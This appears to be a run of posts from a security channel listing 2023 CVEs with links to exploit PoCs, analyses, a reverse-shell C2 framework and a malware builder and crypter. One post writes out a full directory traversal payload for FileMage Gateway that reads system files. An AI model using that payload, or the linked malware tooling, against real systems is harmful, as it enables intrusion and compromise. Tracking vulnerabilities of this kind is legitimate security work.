🤔CVE-2023-27159 : Appwrite <= 1.2.1 - Unauthenticated Server-Side Request Forgery (SSRF)
🟢POC / BLOG : https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA
⛔#Exploit , #PoC
📱@APTANALYSIS
996
🔥CVE-2023-36844 : Juniper JunOS within SRX and EX Series products - Remote Code Execution (RCE IN Juniper Firewalls)
💥CVEs : CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847
🔴Blog : https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
🟢POC : https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
⛔#Exploit , #ANALYSIS
📱@APTANALYSIS
996
😠Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines).
⭐️Repo : https://github.com/t3l3machus/Villain
⛔#C2 , #RedTeam , #Offensive
📱@APTANALYSIS
996
🔔CVE-2023-30943 : Moodle <= 4.2.0 - Arbitrary folder creation (Stored-XSS) to RCE
⭐️Link : https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/
⛔#Hunting
📱@APTANALYSIS
996
⭐️CVE-2023-39026: FileMage Gateway <= 1.10.9 - Directory Traversal
Payload : /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini
⛔#Exploit
📱@APTANALYSIS
996
🟢Bypassing Bitlocker using a cheap logic analyzer
🗣️Link : https://www.errno.fr/BypassingBitlocker
⛔#Bypass
📱@APTANALYSIS
996
🐈CVE-2023-38035 : Ivanti Sentry Authentication Bypass Deep Dive
Blog : https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/
POC : https://github.com/horizon3ai/CVE-2023-38035
⛔#Exploit , #ANALYSIS
📱@APTANALYSIS
996
🔥CVE-2023-26256 & -/-/26255 :
STAGIL Navigation - Menu & Themes plugin <= 2.0.52 for Jira - Unauthenticated Path Traversal
🟢POC : https://github.com/aodsec/CVE-2023-26256
⛔#Exploit
📱@APTANALYSIS
996
🖥Successive / repetition
🐈⬛CVE-2023-27532 : Veeam Backup and Replication
🔴POC : https://github.com/horizon3ai/CVE-2023-27532
🔴POC : https://github.com/sfewer-r7/CVE-2023-27532
🐈⬛CVE-2023-32315 : Openfire
🔴POC : https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
🐈⬛CVE-2021-21974 & CVE-2020-3992: VMware ESXi OpenSLP
🔴1 : https://straightblast.medium.com/my-poc-walkthrough-for-cve-2021-21974-a266bcad14b9
🔴2 : https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/
🔴3 : https://www.zerodayinitiative.com/blog/2021/3/1/cve-2020-3992-amp-cve-2021-21974-pre-auth-remote-code-execution-in-vmware-esxi
🔴POC : https://github.com/Shadow0ps/CVE-2021-21974
🔴POC : https://github.com/straightblast/My-PoC-Exploits/blob/master/CVE-2021-21974.py
⛔#Exploit , #Ransomware , #ANALYSIS
📱@APTANALYSIS
996
🙂Photo Exploit Downloader FUD Crypter Malware Builder
REPO : https://github.com/benedixX0/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023
⚠️Be careful, it has not been tested.
⛔#TOOLS , #EXP
📱@APTANALYSIS
996
🔥CVE-2023-31492 : Zoho ManageEngine ADManager Plus Build 7180 - Recovery Password Disclosure - ZVE-2023-0176
🟢POC : https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md
⛔#Exploit
📱@APTANALYSIS
996
🔔BugBounty Tips :
🗣️Stored XSS Filter Bypass in the Skills section
➡️Write-Up : https://xalgord.medium.com/stored-xss-filter-bypass-in-the-skills-section-7bf5e33c8ace
👩💻Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Collaborate effortlessly with your team and community.
➡️Editor: https://templates.nuclei.sh
➡️Docs: https://docs.nuclei.sh/editor
😵The only graphQL wordlist you need, ML bug hunting and VDP submissions
🗣️intigriti : https://blog.intigriti.com/2023/08/23/bug-bytes-209-the-only-graphql-wordlist-you-need-ml-bug-hunting-and-vdp-submissions/
⛔#Bug_Bounty , #Hunting
📱@APTANALYSIS
